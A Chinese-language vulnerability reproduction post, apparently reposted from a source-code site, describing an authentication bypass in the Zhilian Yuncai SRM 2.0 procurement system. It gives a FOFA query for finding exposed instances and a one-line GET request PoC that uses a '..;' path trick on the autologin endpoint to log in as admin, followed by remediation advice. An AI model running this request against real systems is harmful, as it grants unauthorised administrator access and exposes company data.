1 产品简介
智联云采是一款针对企业供应链管理难题及智能化转型升级需求而设计的解决方案,针对企业供应链管理难题,及智能化转型升级需求,智联云采依托人工智能、物联网、大数据、云等技术,通过软硬件系统化方案,帮助企业实现供应商关系管理和采购线上化、移动化、智能化,提升采购和协同效率,进而规避供需风险,强化供应链整合能力,构建企业利益共同体。
2 漏洞概述
由于智联云采 SRM2.0 autologin 接口代码逻辑存在缺陷,导致未授权的攻击者可以构造特殊绕过身份认证直接以管理员身份接管后台,造成信息泄露,使系统处于极不安全的状态。
3 复现环境
FOFA:title=="SRM 2.0"
4 漏洞复现
PoC
GET /adpweb/static/..;/api/sys/app/autologin?loginName=admin HTTP/1.1
Host:
5 修复建议
关闭互联网暴露面或接口设置访问权限
升级至安全版本
本站资源均来自互联网,仅供研究学习,禁止违法使用和商用,产生法律纠纷本站概不负责!如果侵犯了您的权益请与我们联系!
转载请注明出处: 免费源码网-免费的源码资源网站 » 智联云采 SRM2.0 autologin 身份认证绕过漏洞复现
发表评论 取消回复